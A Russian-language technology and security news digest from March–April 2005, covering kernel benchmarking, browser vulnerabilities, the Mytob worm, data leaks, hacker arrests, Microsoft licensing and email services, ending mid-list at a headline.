Во вторник основатель Linux Линус Торвальдс призвал к более регулярному проведению испытаний ядра Linux на производительность, чтобы любое ухудшение эффективности можно было выявить быстрее. Сейчас известны цифры производительности только для нескольких окончательных версий ядра. Торвальдс сказал, что было бы полезно постоянно тестировать рабочие версии, чтобы облегчить выявление неэффективного кода. «Испытание только окончательных версий означает, что разработчики узнают, когда с производительностью что-то не так, с двухмесячным опозданием, — пишет Торвальдс в постинге в список почтовой рассылки по ядру Linux. — Если же делать это каждый день (или хотя бы пару раз в неделю), то мы будем узнавать гораздо больше интересного». Этот вопрос встал тогда, когда сотрудник Intel Кеннет Чен обнародовал некоторые цифры производительности разных вариантов ядра 2.6. Испытания показали, что версии 2.6.11, 2.6.9, 2.6.8 и 2.6.2 работают соответственно на 13%, 6%, 23% и 1% медленнее, чем базовый код Red Hat Enterprise Linux 3 — который основан на версии ядра 2.4 и дополнен некоторыми функциями из версии 2.6. Чтобы определить, какой именно код приводит к значительным изменениям производительности между разными версиями, необходимы более частые результаты, считает Торвальдс. «Например, ни один разработчик, скорее всего, не скажет, что могло повлиять на изменения между версиями 2.6.2 и 2.6.8, — пишет Торвальдс. — Если бы тесты проводились достаточно часто, интересно было бы вернуться назад к историческим еженедельным (если не ежедневным) билдам и посмотреть, где произошел большой скачок». Чен говорит, что он попытается надавить на своих менеджеров, чтобы ему позволили выполнять тесты производительности более регулярно. «Я обязательно поставлю в известность свое руководство, что Линус хочет получать цифры производительности ежедневно», — сказал он.
ZDNet

3/04/2005 12:16 Эксплоит уязвимости Cyrus imapd
Опубликован эксплоит уязвимости в популярном в мире открытых систем сервере IMAPD - Cyrus imapd версий 2.2.4 - 2.2.8, которая была обнаружена и опубликована Стефаном Эссером.
Исходный код эксплоита

3/04/2005 11:23 Охотник за багами получил премию от Mozilla
Организация Mozilla Foundation наградила исследователя, обнаружившего уязвимости в ее бесплатном веб-браузере, призом в $2500. Группа заплатила немецкому программисту Михаэлю Краксу по $500 за каждый из пяти багов, обнаруженных им в браузере Firefox. «Мы разработали программу вознаграждений, чтобы поощрять членов сообщества, которые находят в программном обеспечении неизвестные ошибки, — сказал директор по инжинирингу Mozilla Foundation Крис Хофманн. — Эта программа — один из многих способов создания безопасного и надежного ПО для пользователей Mozilla Foundation». Исправленные ошибки относятся к chrome privileges — механизму, который позволяет приложениям менять детали пользовательского интерфейса самого браузера. Например, при злоупотреблении эта функция может изменить кнопку Home, так что она будет загружать злокачественные программы. На прошлой неделе Mozilla выпустила обновление Firefox 1.02, исправляющее ошибку переполнения буфера в унаследованном коде Netscape, сохранившемся в браузере для работы с изображениями GIF-анимации. Mozilla — одна из немногих организаций, предлагающих тем, кто находит уязвимости, финансовые стимулы. Microsoft, которая продает свои продукты и регулярно обращается к сообществу пользователей с просьбой протестировать бета-версии своего ПО, не практикует такой схемы.
Подробнее

3/04/2005 10:41 Microsoft расширяет антипиратскую программу
Microsoft планирует потребовать от заказчиков, желающих загружать локализованные дополнения к Windows, предварительно подтвердить легитимность своей копии этого ПО. В ближайшие месяцы Microsoft переведет всех заказчиков, желающих загрузить один из 22 комплектов Language Interface Packs, на режим обязательной предварительной проверки своей копии Windows. «Это довольно ценные дополнения к Windows», — сказал директор программы Microsoft Genuine Windows Дэвид Лазар. Языковые пакеты добавляют опции локализации в дополнение к тем, для которых Microsoft выпускает полноценные версии Windows. Это очередной шаг по расширению программы, по которой пользователям Windows предлагается проверить свою копию ОС, прежде чем загружать различные приложения. В прошлом году, когда началась пилотная программа, она была чисто добровольной и не давала никаких преимуществ владельцам лицензионной версии ПО, а также ничем не грозила владельцам нелицензионных копий. Однако со временем Microsoft добавляет все новые льготы для тех, чья копия Windows проходит тест, и в конце концов объявила о намерении лишить возможности загружать ПО владельцев нелицензионных копий. Microsoft говорит, что пиратство обходится компании в миллионы долларов, однако конкретных цифр не приводит. Организация Business Software Alliance, членом которой является Microsoft, оценивает годовые потери отрасли в $29 млрд, хотя эту цифру оспаривают. Лазар отметил, что языковые пакеты — относительно новое ПО, которое позволяет Microsoft соединить две стратегии: увеличить число языков, на которых доступна Windows, и усилить борьбу с пиратством. Компания планирует начать на этой неделе с вьетнамского языка и каждый месяц добавлять обязательную проверку для четырех или пяти языков. Microsoft постепенно превращает свою программу Windows Genuine Advantage из добровольной в обязательную для большинства загрузок. До сих пор программа оставалась добровольной во всех странах, за исключением трех: Норвегии, Чехии и Китая. Однако к середине этого года Microsoft планирует сделать программу обязательной для всех пользователей.
Подробности

3/04/2005 10:04 Популярный почтовый сервис GMail увеличивает размер ящиков до 2 гигабайт
Компания Google объявила о расширении лимита на объем постовых ящиков своего популярного сервиса бесплатной почты GMail с одного гигабайта до двух. Примечательно, что это произошло 1 апреля - ровно через год с момента запуска сервиса. Тогда объявление о старте проекта GMail многие сочли за первоапрельскую шутку, так как гигабайтный размер бесплатного ящика представлялся экспертам неоправданно большим с технической точки зрения. Вместе с тем, впоследствии практика показала, что Google действительно предоставляет почти всем желающим 1 гигабайт места на жестком диске для хранения своих писем. Однако известно, что в администрации компании любят отмечать 1 апреля, и без шуток там не обошлись - в прошлом году параллельно с объявлением о GMail Google объявила о проекте по созданию лунной базы. В нынешнем году первоапрельской шуткой принято считать сообщение о напитке Google Gulp, который помогает оптимизировать и персонализировать поиск в Интернете через работу с ДНК потребителя. С запуском GMail компания призвала пользователей нового сервиса иначе подходить к работе с почтой - не удалять прочитанные письма, а архивировать их с возможностью восстанавливать цепочки дискуссий и искать в архиве заданные фрагменты текста. Вместе с тем, Gmail был запущен в тестовом режиме - регистрация была открыта не для всех желающих, а только для обладателей специальных пригласительных кодов, которые выдавались в ограниченном количестве. Тестовый режим не отменен до сих пор, хотя количество выдаваемых кодов за год существенно увеличилось. В компании не сообщают, когда Gmail откроется для свободной регистрации.
Lenta.Ru

31/03/2005 10:34 Червь Mytob расползается по интернету
Антивирусные компании предупреждают о появлении большого количества новых модификаций вредоносной программы Mytob. Только за последние несколько дней специалисты по вопросам сетевой безопасности обнаружили восемь новых вариантов этого червя, а с начала марта их число уже превысило двенадцать. Вирус Mytob распространяется по электронной почте в виде вложений с различными названиями, а также через дыру в локальной подсистеме аутентификации пользователей (LSASS) операционных систем Microsoft Windows 2000/ХР. После проникновения на компьютер червь создает в системной директории Windows свою копию под именем msnmsgr.exe и затем регистрируется в реестре с целью обеспечения собственного автозапуска при каждом старте ОС. В процессе организации массовых рассылок вредоносного кода Mytob применяет встроенный SMTP-сервер, адреса жертв при этом извлекаются из файлов с определенными расширениями на жестких дисках инфицированной машины. Кроме того, вредоносная программа открывает "черный ход" в систему для приема команд от авторов. В настоящее время известно о более чем полутора десятках модификаций вредоносной программы Mytob. Большая их часть практически идентичны, хотя вариант Mytob.Q имеет в своем составе другой малоопасный вирус W32.Pinfi. Компания Symantec присвоила червям семейства Mytob рейтинг средней опасности, обновления антивирусных баз данных для защиты от этой вредоносной программы уже выпущены. Кроме того, доступна специальная утилита для удаления вируса.
"Компьюлента"

31/03/2005 09:52 Хакеры рассекретили в России банковскую тайну
В продаже на "черном рынке" появилась электронная база данных по банковским проводкам расчетно-кассовых центров Банка России с апреля 2003 года по сентябрь 2004 года. Как сообщают "Ведомости", предложения приобрести базу с информацией, являющейся банковской тайной, стали рассылать по электронной почте в феврале. "Банковские проводки РКЦ" занимают целых 60 гигабайт и продаются вместе с жестким диском. В рекламных рассылках утверждается, что в базе есть вся информация по проводкам: реквизиты плательщика и получателя, их банков, назначение платежа. Цена банковской базы колеблется в промежутке от 800 до 1000 долларов. По словам одного из продавцов, месяц назад она продавалась за 1500-2000 долларов. Столь высокая цена не способствовала популярности предложения среди потребителей, однако в данном случае для банков важно в первую очередь то, что базу вообще удалось украсть. Пока не известно, какие меры будут предприняты в связи со столь масштабной утечкой информации из Межрегионального центра информатизации ЦБ, где скапливаются все данные о банковских проводках. По словам юристов, если нарушители будут найдены, то за сбор сведений, представляющих собой коммерческую или банковскую тайну (статья 183 УК РФ), они могут попасть в тюрьму на срок до двух лет. Те же, кто воспользуется базой данных, рискуют быть осужденными на срок до трех лет. Кроме того, против нарушителей могут применить и статью 272 УК - "Неправомерный доступ к компьютерной информации", предусматривающую тюремный срок до пяти лет.
"Ведомости"

31/03/2005 09:36 Права на домен .net сохраняются за компанией VeriSign
Права на управление доменом верхнего уровня .net, вероятно, останутся у нынешнего оператора - компании VeriSign, которая также управляет доменом .com. Домен .com является самым популярным адресным пространством в Интернете, .net - третий по популярности. 30 июня 2005 года заканчивается шестилетний срок управления доменом .net. Организация ICANN, занимающаяся глобальным распределением доменов и IP-адресов, в ноябре объявила конкурс среди интернет-компаний, желающих стать новыми операторами зоны. Заявку на второй срок подала и VeriSign. Доходы от поддержки домена .net, в котором в настоящее время зарегистрировано более 5 миллионов имен второго уровня, составляют порядка 30 миллионов долларов ежегодно. Соискатели прав на очередной шестилетний срок управления должны соответствовать требованиям ICANN - в частности, располагать необходимой материальной базой и технологиями. Для аудита существующих рабочих мощностей VeriSign ICANN привлекла независимую консалтинговую фирму Telcordia Technologies, которая в минувший понедельник подтвердила состоятельность этой компании. Как отмечает Associated Press, это может означать, что VeriSign останется оператором .net на второй срок. Тем не менее, ICANN до оконачния срока делегирования будет принимать замечания заинтересованных сторон и проводить консультации.
Lenta.Ru

30/03/2005 16:54 Yahoo увеличит почтовые ящики до 1 Гб
Yahoo планирует еще раз поднять размер бесплатного электронного ящика - на сей раз до 1 Гб. Увеличенный объем соответствует общему у прямого конкурента Yahoo - Google. Увеличение объема планируется в конце апреля для всех пользователей бесплатной электронной почты от Yahoo. Новость появилась ровно через неделю после того, как Google начал свободную регистрацию на их почтовом сервисе - GMail. Вице-президент Yahoo по коммуникациям Брэд Гарлинхауз (Brad Garlinghouse) сказал в интервью, что модернизация почтовой службы не является ответом на последние действия Google. Yahoo также предложит антивирусную проверку, построенную на базе продуктов Symantec.
Источник

30/03/2005 10:51 Microsoft согласилась переименовать европейскую версию Windows XP
Компания Microsoft согласилась принять требования Еврокомиссии, налагающие ограничения на условия распространения в Европе урезанной версии операционной системы Windows XP, сообщает Reuters. Как ранее сообщалось, около года назад корпорация была признана виновным в нечистоплотных действиях по завоеванию рынка и ущемлению прав конкурентов за счет использования своего доминирующего положения на рынке ОС. Суд обязал Microsoft выплатить штраф в размере около 650 миллионов долларов и внести ряд изменений в свою рыночную политику. В частности, компании было предписано убрать из европейских версий Windows программу Windows Media Player, чтобы предоставить конкурентам возможность работать на рынке медиапроигрывающих программ. Microsoft за прошедший год подавала апелляцию, которую суд высшей инстанции не удовлетворил. Затем Microsoft отказалась от дальнейших судебных тяжб, но накануне была обвинена в неисполнении первоначального решения суда. Между Еврокомиссией и Microsoft велись переговоры, которые во вторник завершились согласием Microsoft принять условия ЕС. В частности, одно из них предусматривает, что версия Windows XP без Windows Media Player будет продаваться под маркой "Windows XP Home Edition N". Кроме того, будут изменены несколько изначальных установок в системном реестре и ликвидированы некоторые упоминания о Windows Media Player в документации.
Lenta.Ru

28/03/2005 16:48 Недельный отчет о вирусах Panda Software
Опубликован традиционный еженедельный отчёт о вирусной активности минувшей недели от Panda Software. В отчете представлены два червя Mydoom.BH и Crowt.B и троянец Downloader.BHV
Отчёт

28/03/2005 15:37 Арестован китайский хакер взломавший 100 000 компьютеов
Власти Китая утверждают, что им удалось поймать хакера, обвиняемого во взломе 100 000 компьютеров. В Министерство безопасности Китая говорят, что данное задержание - результат скоординированной работы их подразделений. Неназванный хакер получил контроль над 100 000 компьютерами при помощи созданного им вируса, причем, замечают в Министерстве, 40% компьютеров находились за пределами Китая. В информационном агентстве Синьхуа поясняют, что инфицированные компьютеры представляли собой целую сеть, которая могла использоваться для проведения Dos-атак (denial of service) или краж личной информации пользователей. Неназванный хакер был арестован в провинции Хебей в городе Таньшан.
Источник

28/03/2005 14:36 Группа хакеров взломала защиту банка "Сумитомо Мицуи"
В среду лондонская полиция раскрыла попытку одной из крупнейших в истории банковских афер по "отмыванию денег", и следы преступления ведут в Израиль. Израильская полиция уже арестовала одного из подозреваемых, 35-летнего Яарона Блонди из Холона. Он обвиняется в мошенничестве и отмывании денег. С октября 2004 года израильские полицейские вели расследование совместно с британским отделом компьютерной преступности, который координировал следственные действия в 10 странах. Общий план аферы заключался в том, чтобы перевести 220 миллионов фунтов стерлингов (около 2 миллиардов шекелей) из лондонского отделения банка "Сумитомо Мицуи" в десять различных банков мира. 20 миллионов евро из этой суммы планировалось перевести на счет, открытый арестованным жителем Холона. Однако, аферу раскрыли до того, как деньги были украдены. Полиция подозревает, что группа хакеров взломала систему защиты банка "Сумитомо Мицуи". Пока неясно, пришлось ли хакерам для этого заходить в помещение самого банка и устанавливать на банковские компьютеры специальные программы, или они сумели взломать системы безопасности через Интернет. Между тем, адвокат Блонди заявил JNews, что его клиент был лишь пешкой в большой игре - организаторы преступления лишь пытались перевести деньги на его счет, а он не имел никакого понятия о происхождении этих сумм.
SecurityLab

28/03/2005 11:25 История развития GUI в картинках
Довольно интересную, полезную и занимательную подборку различных GUI (графических интерефейсов пользователя) собрал на своём сайте программист и технический специалист (как он сам о себе пишет) Nathan Lineback. Фактически подборка представляет собой историю развития графических интерфейсов. Самый первый из них относится аж к 1973 г. и компьютеру Alto с графической оболочкой (если её сейчас можно так назвать) Xerox PARC. Кроме того, автор сгруппировал также графические интерфейсы по операционным системам: Windows, Linux, Apple, OS/2, BeOS, QNX и т.д. Очень интересно и познавательно. Возможно, некоторых при взгляде на внешний вид этих GUI, прошибёт скупая мужская слеза, напоминая о молодости. :) Вторая ссылка представляет собой некое подобие хронологической таблицы GUI в различных ОС.
История
Таблица

28/03/2005 10:43 Переполнение буфера при просмотре JPEG-файла в QuickTime
В списке рассылки BUGTRAQ некий исследоатель компьютерной безопасности опубликовал метод, при помощи которого можно сформировать JPEG-файл, который, будучи просмотрен в QuickTime PictureViewer (версия 6.5.1) ОС Windows вызывает переполнение буфера с "падением" Windows с ошибкой "access violation error". Как пишет сам автор, дальнейшим шагом было бы написание реального эксплоита, который бы позволил выполнить произвольный код в системе, однако он оставляет этот занимательный процесс на усмотрение широкой публики. Формирование некорректного JPEG-файла сводится к формированию определённого значения сегмента таблицы Хаффмана (DHT). Автор также приводит пример скрипта на Питоне для формирования подобного JPEG-файла.
Описание

28/03/2005 10:29 Неудавшийся конкурс по написанию вируса для Mac
Группа разработчиков с сайта DVForge предложила конкурс, который почти сразу же отменила, cообщает linux.org.ru. За 25 тысяч долларов предложено разработать вирус, который успешно заразит два "голых" мака, использующих родное программное обеспечение от Apple. Приз увеличивался до 50 тысяч долларов в случае, если удачливым хакером окажется сотрудник Symantec, потому как фирма в последнее время сделала несколько громких заявлений о том, что "Маки нисколько не безопаснее. Просто Windows - значительно бОльшая мешень для атак". Конкурс отменили по многочисленным просьбам пользователей.
О конкурсе

28/03/2005 09:46 Internet Explorer весь год подвергал пользователей опасностям
Компьютеры пользователей, предпочитающих для работы в интернете браузер Internet Explorer, пребывали в опасности 98 процентов всего времени 2004 года. Пользователи Mozilla и Firefox были уязвимы в течение 15 процентов всего времени 2004 года. Таковы результаты исследования, проведенного бельгийской компанией ScanIT, сообщает сайт Security Pipeline. В основу своего исследования ScanIT положила временные промежутки между обнаружением уязвимости в браузере и выпуском заплатки для нее. Суммировав периоды, в течение которых уязвимости были открыты, эксперты получили сроки безопасного использования браузеров. Дополнительным условием подсчета было сопоставление дней, в которые уязвимости были открыты и дней, в которые были зафиксированы эксплойты для этих уязвимостей. Браузер Internet Explorer был надежно защищен в течение всего 7 дней 2004 года. «В 2004 году был только один период, во время которого не появлялось публичной информации об уязвимостях в Internet Explorer. Это неделя с 12 по 19 октября. Значит, что браузер с самыми последними обновлениями был небезопасен в течение 98 процентов времени», — говорится в исследовании Scan IT. В течение 200 дней (54 процента продолжительности года) существовали вирусы и черви, использовавшие одну из уязвимостей IE, добавляют эксперты. Firefox и другие браузеры Mozilla Foundation были уязвимы всего 56 дней (15 процентов продолжительности года). При этом под уязвимости Mozilla не было написано ни одного вируса. «В 2004 году вирусописатели не обращали внимания на Mozilla. Однако ситуация может измениться с ростом популярности Mozilla», — считают в ScanIT. Впрочем, даже несмотря на рост популярности браузеры Mozilla/Firefox, вероятно, будут иметь преимущество перед IE. Эксперты в области безопасности склонны сообщать об уязвимостях команде разработчиков Mozilla, а не публиковать их. Возможно, это связано с тем, что Mozilla — продукт с открытым кодом. Специалисты ScanIT также берут в расчет денежное вознаграждение в 500 долларов, которое разработчики Mozilla платят за информацию об обнаруженных уязвимостях.
Viruslist

28/03/2005 09:23 Голландская прокуратура пытается отключить террористов от Интернета
Голландские власти попытались отрезать иракских террористов от Интернета, передает Newsweek. Прокуратура Утрехта сообщила журналистам, что начато расследование деятельности голландской хостинговой компании 357Hosting, предоставляющей свои услуги сайтам исламистских радикальных группировок. На этих сайтах регулярно появляется информация о деятельности иракских и палестинских террористов и обращения лидеров боевиков, в частности, Абу Мусаба аль-Заркави. Бывший руководитель компании, некий Авад, сообщил, что некоторым из этих сайтов хостинг предоставлялся бесплатно. Авад признал, что в прошлом услугами его компании действительно пользовались интернет-сайты "которые могут быть сочтены радикальными", в том числе, сайты, прославляющие действия иракских и палестинских боевиков. Среди сайтов, которым предоставляет хостинг компания, сайты Albasrah.net, на котором размещается ежедневный выпуск новостей от иракских боевиков, сайт Hamasonline.com, на котором освещается деятельность палестинских группировок, и сайт Shareeah.org, излагающий взгляды Абу-Хамзы, лондонского имама, находящегося в тюрьме по обвинению в причастности к террористической деятельности.
Подробнее

27/03/2005 15:11 Симферопольские студенты обвиняются в хакерстве
Двое 19-летних симферопольских студентов обвиняются в воровстве компьютерной информации. Это первые в Крыму уголовные дела, которые возбуждены за хакерство. По словам старшего референта пресс-группы ГУ СБУ в АРК Ирины Галинской, студенты, используя слабые места операционных систем, получали доступ к компьютерам простых крымчан, а также предприятий и фирм. В первую очередь воров интересовали сведения о владельце, логин и пароль доступа в Интернет. Эти данные они продавали. Установлено, что одним логином могли одновременно пользоваться 12 человек: сам хакер, его друзья и покупатели. Последним продавцы гарантировали месяц работы в Интернете. По данным СБУ, за последние несколько месяцев 22 человека приобрели ворованные логины и пароли. Оперативники СБУ, проанализировав деятельность хакеров, насчитали свыше сорока потерпевших. А если пересчитать время, украденное студентами у провайдеров, на дни, получится более семи месяцев. Материальный ущерб исчисляется не одной тысячей гривен, передает Новый Регион – Крым. По словам Галинской, на данном этапе следователи службы безопасности установили и опросили всех незаконных пользователей ворованных паролей и логинов, а также их официальных владельцев. Вещественные доказательства совершенных преступлений изъяты и приобщены к материалам дела. Уголовный кодекс Украины за подобные преступления предусматривает максимальное наказание в виде лишения свободы на срок до пяти лет.
Crime-Research

27/03/2005 12:54 Cкринсэйвер стоимостью в 100.000 долларов
На сайте Net4Nowt описывается занимательный и довольно поучительный случай из жизни одной юридической фирмы, имеющей офисы во многих странах мира. Любовь одного из сотрудников к красивым и бесплатным скринсэйверам обошлась фирме в 100.000 "американских рублей". История началась в понедельник утром (знаменательный для всего российского населения день), когда специалисты компьютерной фирмы AnswersThatWork.com были срочно вызваны одним из своих клиентов - юридической фирмой, в связи с невозможностью связаться ни с одним из своих фоисов по сети. Перед этим в уик-энд специалисты фирмы производили обновление сетевой инфраструктуры юристов, поэтому, естественно, было сделано предположение о неполадках, связанных с этими работами. Однако дальнейший анализ показал, что причина скрывалась не в этом. Было выяснено, что утром в понедельник, один из сотрудников получил по электронной почте сообщение о "свободном и красивом скринсэйвере", что (естественно) тут же заставило этого сотрудника проверить, насколько же симпатичен этот скринсейвер. Посетив указанный линк и скачав скринсейвер, сотрудник убедился, что ожидания его не обманули. Как настоящий друг он не премминул поделиться своей радостью со своими коллегами, которые так же начали качать скринсэйвер. И всё бы ничего, но помимо красивого вывода на экран, скринсэйвер содержал в себе код троянца, который, будучи запущен, выполнял DoS-атаку на определённый компьютер сети. В результате подобного любопытства оказались заражёнными 16 компьютеров сети! В результате выполнения большого количества сетевых запросов, работа сети была парализована. Специалисты AnswersThatWork вычистили заразу, не забыв взять (что естественно) гонорар за выполненную работу. В результате суммарный ущерб фирмы сотавил 100.000$. Вот такая вот поучительная история, из которой должен быть вынесен урок о том, что в каждой фирме должна быть выработана политика сетевой безопасности.
История

27/03/2005 11:36 Microsoft запатентовала IPv6?
Вокруг корпорации Microsoft разгорается очередной скандал. Стало известно, что эта фирма еще в 2000 г. получила патент на технологию, похожую на IPv6. Протокол IPv6 считается открытым стандартом. Как известно, именно с протоколом IPv6 связывают будущее всего интернета, и сейчас в разных уголках мира потихоньку создаются сети, основанные на этом IP-протоколе нового поколения. Наличие патента Microsoft, в котором описывается технология, похожая на IPv6, — это еще один пример того, что современная патентная система имеет весь необходимый потенциал, чтобы убить или резко затормозить распространение инновационных открытых стандартов. Патент № 6.101.499 под названием «Метод и компьютерный программный продукт для автоматической генерации IP-адресов» был выдан в августе 2000 г., а заявку на него Microsoft подала еще в 1998 г. Формулировки в тексте патента весьма расплывчаты и сложно сказать, что это именно IPv6. Не указано явно, что это вообще протокол. Но сходство патента с протоколом IPv6 подтверждается тем, что несколько инженеров Microsoft, чьи имена перечислены в патенте, оказались в рабочей группе IETF по разработке IPv6. Это не может быть совпадением. Странный патент, выданный редмондскому гиганту, обнаружили специалисты анти-патентной организации Public Patent Foundation (Pubpat), которая ставит целью своей деятельности защиту общества от вреда, причиняемого патентной системой. Они считают, что патент должен быть признан недействительным, потому что Microsoft не сообщила в патентное ведомство полную информацию о личностях изобретателей, которые к тому времени уже входили в комитет IPv6 рабочей группы по созданию открытых стандартов IETF. Конечно, корпорация Microsoft до сих пор не подавала никаких исков и не заявляла о своих правах в суде. И вряд ли она это сделает. Но проблема заключается не в том, что Microsoft собирается получить прибыль за счет всего интернета, а в том, что она теоретически может это сделать. Дэниэл Равичер (Daniel Ravicher), исполнительный директор Pubpat, говорит, что вряд ли Microsoft будет заявлять свои права на IPv6, но теперь многие компании могут просто отказаться от реализации IP-протокола следующего поколения, потому что его использование становится рискованным. «Microsoft никогда не будет использовать этот патент — они знают, что это бессмысленно, — говорит Равичер. — Но всегда останутся люди, которые будут бояться этого. Если у кого-то в руках пистолет и он обещает не стрелять, то все равно как-то страшновато». Равичер сообщил, что организация Pubpat узнала о патенте от «нескольких крупных компаний», которым о патенте рассказала сама Microsoft. Возможно, что налицо — первые факты запугивания. Это еще один пример того, как современная патентная система может убить или резко затормозить распространение инновационных стандартов. Представители Microsoft пока никак не комментируют эту ситуацию. Организация Pubpat обратилась к Microsoft с призывом публично отказаться от своего патента и признаться, что он был зарегистрирован неправильно. Читатели Slashdot предлагают вообще запретить патентному ведомству США выдавать Microsoft какие-либо патенты в течение минимум десяти лет.
Вебпланета

27/03/2005 10:33 Защита программ и скриптов от модификации в FreeBSD
Christian S.J. Peron предложил провести тестирование mac_chkexec патча для FreeBSD -CURRENT и RELENG_5, дающего возможность защититься от подмены или модификации запускных файлов в системе, cообщает opennet.ru. В случае если для запущенной программы, библиотеки, скрипта или модуля ядра не совпадает контрольная сумма, приложение завершается с ошибкой. mac_chkexec может работать в режиме самообучения (автогенерация хеша для ранее не запускавшихся программ) и режим выполнения только авторизированных запускных файлов.
Подробнее о технологии

27/03/2005 10:27 Toshiba заплатит штраф за промышленный шпионаж
Японская корпорация Toshiba заплатит $381 млн компании Lexar Media за кражу производственных секретов. Иск Lexar связан с технологиями изготовления чипов для съемных карт памяти, используемых в цифровых камерах и многих других портативных продуктах. Для возмещения нанесенного ущерба Toshiba придется выплатить не только назначенную судом сумму, но и приостановить продажу чипов. Судебные запреты на продажу столь распространенного товара — редкое явление. Если Lexar сумеет добиться такого запрета в отношении продуктов Toshiba, это решение затронет также бизнес корпорации SanDisk, которая использует чипы Toshiba в своих изделиях. Компания Lexar, выделившаяся из состава Cirrus Logic , в течение короткого периода была партнером Toshiba. Японская корпорация вкладывала в Lexar средства, а ее представитель в свою очередь входил в совет директоров американской компании. Как раз тогда Toshiba получила возможность доступа к коммерческим секретам партнера.
Источник

27/03/2005 09:45 Symbian получила лицензию на Microsoft Exchange Server ActiveSync
Компания Symbian Limited сообщила о получении лицензии на использование протокола Microsoft Exchange Server ActiveSync в операционной системе Symbian OS. В соответствии с полученной лицензией Symbian намерена разработать плагин, реализующий поддержку нового протокола в Symbian OS. С новым плагином у телефонов, работающих под управлением Symbian OS появится возможность "на лету" синхронизировать данные электронной почты, списки контактов, календари и другие виды данных, поддерживаемые Microsoft Exchange Server 2003. Подробности лицензионного соглашения между Symbian и Microsoft пока не разглашаются.
Mobile-Review

27/03/2005 09:21 Blue Gene/L удвоил собственный рекорд
Удвоившись в размерах, суперкомпьютер IBM Blue Gene/L удвоил свой собственный рекорд производительности; как сообщило в среду Министерство энергетики США, теперь эта машина выполняет 135,5 трлн вычислений в секунду. В ноябре прошлого года система, которая сейчас устанавливается в Национальной лаборатории Лоуренса в Ливерморе, возглавила рейтинг 500 самых быстродействующих компьютеров, продемонстрировав установившуюся производительность в 70,7 трлн операций в секунду. Последний скачок производительности произошел в результате доведения числа стоек в системе до 32. Если все пойдет по плану, то окончательная конфигурация машины, монтаж которой планируется завершить в этом году, будет содержать 64 стойки с общей производительностью в 270 терафлопов. Каждая стойка содержит 1024 процессора. Каждый процессор, специальный вариант семейства IBM Power, содержит по два процессорных ядра. Для исполнения стандартного теста производительности, используемого для оценки компьютеров из списка top 500 (так называемый тест Linpack), в вычислениях может участвовать каждое ядро, однако во многих реальных задачах под расчеты будет выделяться только одно из ядер. Blue Gene/L — один из нескольких продуктов, ставших результатом сосредоточения IBM на высокопроизводительных технических вычислениях. Компания пытается удержать лидирующую позицию на рынке, не уступая Hewlett-Packard, и поддерживает свои машины на уровне, недоступном для конкурентов, в число которых входят Silicon Graphics и NEC.
Подробности

26/03/2005 14:41 Ульяновские хакеры работают на местные преступные группировки
Некоторые продвинутые ульяновские хакеры работают на местные организованные преступные группировки. Об этом вчера на пресс-конференции сообщил заместитель начальника управления специальных технических мероприятий при УВД полковник милиции Александр Астапенко. Раскрытием преступлений в сфере высоких технологий занимаются отделы «Р» (радиоэлектронная безопасность) и «К» (компьютерная безопасность). Наш регион, несмотря на низкий уровень жизни, имеет развитую телекоммуникационную сеть, заявил Александр Астапенко. Одних только пользователей интернета у нас более ста тысяч. Растет и количество преступлений в этой сфере. Если в 2001 году их было выявлено около 30, то в прошлом году - 143. В основном это проникновение в чужую базу данных, взлом паролей, сайтов, мошенничество через интернет, перекачивание базы данных, распространение коммерческих тайн банков и другой конфиденциальной информации. Как правило, клиентами спецподразделения бывают люди высокообразованные, интеллектуальные. Чтобы пресечь компьютерные преступления, оперативники начали использовать довольно любопытную методику. Выслеживают по своим каналам хакера, приглашают его с родителями в отдел и разъясняют, что он совершает самое настоящее преступление, ничем не отличающееся, например, от кражи или разбоя. Метод действует отменно. Кстати, среди хакеров были замечены и девушки. За два прошедших месяца этого года сотрудники отдела «К» уже зарегистрировали 15 компьютерных преступлений. Недавно спецотдел открыл свой сайт, и как-то на гостевую страничку пришло письмо от хакера. Неизвестный оскорбительно написал, мол, вы все пьяницы, тунеядцы и не можете работать. Оперативники нашли этого человека и пригласили к себе. Оказалось, он имеет зуб на оперативников (в свое время был разоблачен). В отдел он пришел с адвокатом. Но когда милиционеры пригрозили ему статьей за клевету, адвокат не смог возразить.
Подробнее

26/03/2005 13:38 У Napster появляется новый последователь
Бывший партнер файлообменной сети Napster — немецкий медиаконцерн Bertelsmann — выпускает новую интернет-платформу для обмена файлами с фильмами и играми, сообщает Reuters. Новый сервис получит название GNAB. Bertelsmann планирует продавать его операторам мобильной связи, интернет-провайдерам и телевизионным каналам. В свою очередь все покупатели GNAB будут предлагать услуги по законному скачиванию файлов уже под своими собственными брендами. Потребители также получат право обмениваться законно скачанными файлами. Обмен как законно, так и незаконно скачанными файлами очень популярен среди интернет-пользователей. Службы, подобные eDonkey и KaZaA стали огромными файловыми архивами и практически оставили не у дел легальную музыкальную индустрию. Спасением для нее стали технологии, подобные Apple iTunes. С их помощью музыкальные издатели могут получать деньги и за скачивание файлов. Концерн Bertelsmann, являющийся совладельцем второго по величине музыкального лейбла Sony BMG, в 2000 году объединился с файлообменной службой Napster. В то время Napster уже активно защищался в суде от обладателей авторских прав на музыкальные произведения.
Источник

26/03/2005 12:26 Mozilla: Мы все равно безопаснее Microsoft
Даже несмотря на растущую популярность, открытый web-браузер Firefox сохранит статус более безопасного решения, чем Internet Explorer, утверждают в Mozilla Foundation. «Ничего идеального нет», — заявила Митчелл Бэйкер (Mitchell Baker), президент некоммерческой организации Mozilla Foundation, на PC Forum в Скоттсдейле (Аризона, США). Однако, что бы ни твердили критики вроде Джона Томпсона (John Thompson) из Symantec, если верить прогнозам Бэйкер, Firefox все равно не будет так изобиловать уязвимостями в безопасности, как это свойственно Internet Explorer от Microsoft. Отчасти лучшая безопасность Firefox обеспечивается тем, как браузер разрабатывается. «Наше выдающееся преимущество в том, что браузер не является частью операционной системы», — заметила Бэйкер. Другой плюс — отсутствие в Firefox поддержки технологии Active X.
Nixp.Ru

26/03/2005 12:14 "Фишеры" атакуют Yahoo Messenger
